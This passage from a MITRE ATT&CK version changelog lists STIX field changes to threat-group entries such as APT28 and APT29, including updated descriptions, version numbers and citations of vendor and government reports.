external_references[6]['url']https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.htmlhttps://www.crowdstrike.com/blog/wizard-spider-adversary-update/
external_references[7]['source_name']FireEye Ryuk and Trickbot January 2019FireEye KEGTAP SINGLEMALT October 2020
external_references[7]['description']Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.
external_references[7]['url']https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.htmlhttps://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
external_references[8]['source_name']CrowdStrike Grim Spider May 2019FireEye Ryuk and Trickbot January 2019
external_references[8]['description']John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.
external_references[8]['url']https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
x_mitre_version1.32.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'CrowdStrike Grim Spider May 2019', 'description': 'John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.', 'url': 'https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/'}
x_mitre_contributorsEdward Millington
Minor Version Changes

[G0099] APT-C-36

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-14 14:40:36.467000+00:002021-05-26 20:17:53.085000+00:00
x_mitre_version1.01.1

[G0006] APT1

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 18:35:55.290000+00:002021-05-26 12:23:48.842000+00:00
x_mitre_version1.31.4

[G0073] APT19

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 13:56:34.975000+00:002021-05-26 12:38:01.003000+00:00
x_mitre_version1.31.4

[G0007] APT28

Current version: 3.2

Version changed from: 3.1 → 3.2


Old Description
New Description
t1[APT28](https://attack.mitre.org/groups/G0007) is a threat gt1[APT28](https://attack.mitre.org/groups/G0007) is a threat g
>roup that has been attributed to Russia's General Staff Main>roup that has been attributed to Russia's General Staff Main
> Intelligence Directorate (GRU) 85th Main Special Service Ce> Intelligence Directorate (GRU) 85th Main Special Service Ce
>nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub>nter (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub
> August 2020) This group has been active since at least 2004> August 2020)(Citation: Cybersecurity Advisory GRU Brute For
>.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Tech>ce Campaign July 2021) This group has been active since at l
>nica GRU indictment Jul 2018) (Citation: Crowdstrike DNC Jun>east 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: 
>e 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG->Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike 
>4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZ>DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWork
>ZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: >s TG-4127)(Citation: FireEye APT28 January 2017)(Citation: G
>Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018>RIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation:
>) (Citation: ESET Zebrocy May 2019)  [APT28](https://attack.> Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018
>mitre.org/groups/G0007) reportedly compromised the Hillary C>)(Citation: ESET Zebrocy May 2019)  [APT28](https://attack.m
>linton campaign, the Democratic National Committee, and the >itre.org/groups/G0007) reportedly compromised the Hillary Cl
>Democratic Congressional Campaign Committee in 2016 in an at>inton campaign, the Democratic National Committee, and the D
>tempt to interfere with the U.S. presidential election. (Cit>emocratic Congressional Campaign Committee in 2016 in an att
>ation: Crowdstrike DNC June 2016) In 2018, the US indicted f>empt to interfere with the U.S. presidential election. (Cita
>ive GRU Unit 26165 officers associated with [APT28](https://>tion: Crowdstrike DNC June 2016) In 2018, the US indicted fi
>attack.mitre.org/groups/G0007) for cyber operations (includi>ve GRU Unit 26165 officers associated with [APT28](https://a
>ng close-access operations) conducted between 2014 and 2018 >ttack.mitre.org/groups/G0007) for cyber operations (includin
>against the World Anti-Doping Agency (WADA), the US Anti-Dop>g close-access operations) conducted between 2014 and 2018 a
>ing Agency, a US nuclear facility, the Organization for the >gainst the World Anti-Doping Agency (WADA), the US Anti-Dopi
>Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chem>ng Agency, a US nuclear facility, the Organization for the P
>icals Laboratory, and other organizations.(Citation: US Dist>rohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemi
>rict Court Indictment GRU Oct 2018) Some of these were condu>cals Laboratory, and other organizations.(Citation: US Distr
>cted with the assistance of GRU Unit 74455, which is also re>ict Court Indictment GRU Oct 2018) Some of these were conduc
>ferred to as [Sandworm Team](https://attack.mitre.org/groups>ted with the assistance of GRU Unit 74455, which is also ref
>/G0034). >erred to as [Sandworm Team](https://attack.mitre.org/groups/
 >G0034). 
Details
values_changed
STIX FieldOld valueNew Value
modified2021-04-19 21:59:12.033000+00:002021-10-18 20:34:03.233000+00:00
description[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018) (Citation: Ars Technica GRU indictment Jul 2018) (Citation: Crowdstrike DNC June 2016) (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: FireEye APT28 January 2017) (Citation: GRIZZLY STEPPE JAR) (Citation: Sofacy DealersChoice) (Citation: Palo Alto Sofacy 06-2018) (Citation: Symantec APT28 Oct 2018) (Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). [APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019) [APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).
external_references[1]['description'](Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[5]['description']This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT. (Citation: FireEye APT28 January 2017) (Citation: SecureWorks TG-4127) (Citation: Kaspersky Sofacy) (Citation: Ars Technica GRU indictment Jul 2018)This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT.(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)
external_references[6]['description']This designation has been used in reporting both to refer to the threat group and its associated malware. (Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)
external_references[7]['description'](Citation: SecureWorks TG-4127) (Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) (Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020)
external_references[8]['description'](Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[9]['description'](Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Microsoft STRONTIUM Aug 2019) (Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020) (Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[14]['source_name']DOJ GRU Indictment Jul 2018Cybersecurity Advisory GRU Brute Force Campaign July 2021
external_references[14]['description']Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
external_references[14]['url']https://www.justice.gov/file/1080281/downloadhttps://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
external_references[15]['source_name']Ars Technica GRU indictment Jul 2018DOJ GRU Indictment Jul 2018
external_references[15]['description']Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.
external_references[15]['url']https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/https://www.justice.gov/file/1080281/download
external_references[16]['source_name']Crowdstrike DNC June 2016Ars Technica GRU indictment Jul 2018
external_references[16]['description']Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.
external_references[16]['url']https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/
external_references[17]['source_name']FireEye APT28Crowdstrike DNC June 2016
external_references[17]['description']FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[17]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
external_references[18]['source_name']SecureWorks TG-4127FireEye APT28
external_references[18]['description']SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[18]['url']https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaignhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[19]['source_name']FireEye APT28 January 2017SecureWorks TG-4127
external_references[19]['description']FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.
external_references[19]['url']https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdfhttps://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign
external_references[20]['source_name']GRIZZLY STEPPE JARFireEye APT28 January 2017
external_references[20]['description']Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[20]['url']https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[21]['source_name']Sofacy DealersChoiceGRIZZLY STEPPE JAR
external_references[21]['description']Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[21]['url']https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[22]['source_name']Palo Alto Sofacy 06-2018Sofacy DealersChoice
external_references[22]['description']Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
external_references[22]['url']https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/
external_references[23]['source_name']Symantec APT28 Oct 2018Palo Alto Sofacy 06-2018
external_references[23]['description']Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
external_references[23]['url']https://www.symantec.com/blogs/election-security/apt28-espionage-military-governmenthttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
external_references[24]['source_name']ESET Zebrocy May 2019Symantec APT28 Oct 2018
external_references[24]['description']ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
external_references[24]['url']https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/https://www.symantec.com/blogs/election-security/apt28-espionage-military-government
external_references[25]['source_name']US District Court Indictment GRU Oct 2018ESET Zebrocy May 2019
external_references[25]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
external_references[25]['url']https://www.justice.gov/opa/page/file/1098481/downloadhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
external_references[26]['source_name']Kaspersky SofacyUS District Court Indictment GRU Oct 2018
external_references[26]['description']Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[26]['url']https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/https://www.justice.gov/opa/page/file/1098481/download
external_references[27]['source_name']ESET Sednit Part 3Kaspersky Sofacy
external_references[27]['description']ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
external_references[27]['url']http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdfhttps://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
external_references[28]['source_name']Talos Seduploader Oct 2017ESET Sednit Part 3
external_references[28]['description']Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
external_references[28]['url']https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.htmlhttp://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
external_references[29]['source_name']Securelist Sofacy Feb 2018Talos Seduploader Oct 2017
external_references[29]['description']Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
external_references[29]['url']https://securelist.com/a-slice-of-2017-sofacy-activity/83930/https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
external_references[30]['source_name']Accenture SNAKEMACKEREL Nov 2018Securelist Sofacy Feb 2018
external_references[30]['description']Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
external_references[30]['url']https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
external_references[31]['source_name']TrendMicro Pawn Storm Dec 2020Accenture SNAKEMACKEREL Nov 2018
external_references[31]['description']Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
external_references[31]['url']https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.htmlhttps://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50
external_references[32]['source_name']Microsoft STRONTIUM Aug 2019TrendMicro Pawn Storm Dec 2020
external_references[32]['description']MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.
external_references[32]['url']https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html
external_references[33]['source_name']Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020Microsoft STRONTIUM Aug 2019
external_references[33]['description']Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.
external_references[33]['url']https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
x_mitre_version3.13.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020', 'description': 'Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.', 'url': 'https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/'}

[G0016] APT29

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1[APT29](https://attack.mitre.org/groups/G0016) is threat grot1[APT29](https://attack.mitre.org/groups/G0016) is threat gro
>up that has been attributed to Russia's Foreign Intelligence>up that has been attributed to Russia's Foreign Intelligence
> Service (SVR).(Citation: White House Imposing Costs RU Gov > Service (SVR).(Citation: White House Imposing Costs RU Gov 
>April 2021)(Citation: UK Gov Malign RIS Activity April 2021)>April 2021)(Citation: UK Gov Malign RIS Activity April 2021)
> They have operated since at least 2008, often targeting gov> They have operated since at least 2008, often targeting gov
>ernment networks in Europe and NATO member countries, resear>ernment networks in Europe and NATO member countries, resear
>ch institutes, and think tanks. [APT29](https://attack.mitre>ch institutes, and think tanks. [APT29](https://attack.mitre
>.org/groups/G0016) reportedly compromised the Democratic Nat>.org/groups/G0016) reportedly compromised the Democratic Nat
>ional Committee starting in the summer of 2015.(Citation: F->ional Committee starting in the summer of 2015.(Citation: F-
>Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Cr>Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Cr
>owdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia >owdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia 
>SolarWinds April 2021)  In April 2021, the US and UK governm>SolarWinds April 2021)  In April 2021, the US and UK governm
>ents attributed the SolarWinds supply chain compromise cyber>ents attributed the SolarWinds supply chain compromise cyber
> operation to the SVR; public statements included citations > operation to the SVR; public statements included citations 
>to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear>to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear
>, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds>, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds
> April 2021)(Citation: UK NSCS Russia SolarWinds April 2021)> April 2021)(Citation: UK NSCS Russia SolarWinds April 2021)
> Victims of this campaign included government, consulting, t> Victims of this campaign included government, consulting, t
>echnology, telecom, and other organizations in North America>echnology, telecom, and other organizations in North America
>, Europe, Asia, and the Middle East. Industry reporting refe>, Europe, Asia, and the Middle East. Industry reporting refe
>rred to the actors involved in this campaign as UNC2452, NOB>rred to the actors involved in this campaign as UNC2452, NOB
>ELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUN>ELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUN
>BURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2>BURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2
>021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Cit>021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Cit
>ation: Volexity SolarWinds)>ation: Volexity SolarWinds)(Citation: Cybersecurity Advisory
 > SVR TTP May 2021)
Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/
values_changed
STIX FieldOld valueNew Value
modified2021-04-30 12:11:56.336000+00:002021-10-16 00:59:58.792000+00:00
description[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021) In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021) In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)
external_references[1]['description'](Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)
external_references[2]['source_name']Dark HaloNobleBaron
external_references[2]['description'](Citation: Volexity SolarWinds)(Citation: SentinelOne NobleBaron June 2021)
external_references[3]['source_name']StellarParticleDark Halo
external_references[3]['description'](Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)
external_references[4]['source_name']NOBELIUMStellarParticle
external_references[4]['description'](Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)
external_references[5]['source_name']UNC2452NOBELIUM
external_references[5]['description'](Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021)
external_references[6]['source_name']YTTRIUMUNC2452
external_references[6]['description'](Citation: Microsoft Unidentified Dec 2018)(Citation: FireEye SUNBURST Backdoor December 2020)
external_references[7]['source_name']The DukesYTTRIUM
